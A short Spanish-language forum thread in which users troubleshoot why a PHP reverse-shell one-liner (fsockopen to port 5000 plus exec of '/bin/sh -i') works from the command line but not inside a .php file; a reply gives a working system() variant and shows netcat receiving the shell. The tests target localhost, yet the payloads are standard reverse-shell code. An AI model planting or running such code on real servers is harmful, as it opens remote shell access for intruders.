duda PHP

[MichBukana]

Hola foro tengo una duda

si pongo netcat a la escucha en el puerto 5000:

Código (bash) [Seleccionar] Expandir

netcat -l -p 5000 -vv

y en otra terminal ejecuto esto:

Código (php) [Seleccionar] Expandir

php -r '$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");'

me devuelve una shell, Todo correcto ahora si creo una archivo.php y hago esto:
//NO ME FUNCIONA, No devuelve la shell

Código (php) [Seleccionar] Expandir


        <?php
       
       $ultima_linea = system("php -r '\$sock=fsockopen(\"127.0.0.1\",5000);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",$retval);
        ?>       

o esto:
       
        //NO ME FUNCIONA, No devuelve la shell, Péeero si conecta....
       

Código (php) [Seleccionar] Expandir

<?php
        $sock=fsockopen(127.0.0.1, 5000);
        exec("/bin/sh -i <&3 >&3 2>&3");
        ?>

[it3r]

Hola, interesante lo que posteas, podrias exaplicarme que realiza este comando?

Código [Seleccionar] Expandir

/bin/sh -i <&3 >&3 2>&3\

se que ejecuta una shell pero mas aya de eso no entiendo :X

y en cuanto a tu problema a mi me resulto con:

Código [Seleccionar] Expandir

system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\'');

saludos.

[MichBukana]

estas seguro que te conecta teniendo netcat a la escucha?

Código (php) [Seleccionar] Expandir

<php system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\''); ?>


por que acabo de probarlo en un OS X y no me funcionó.

en que S.O. tienes el servidor con php?

[it3r]

fedora..

Código [Seleccionar] Expandir


[dr@dr ~]$ nc -l 5000
sh: no job control in this shell
sh-4.1$


saludos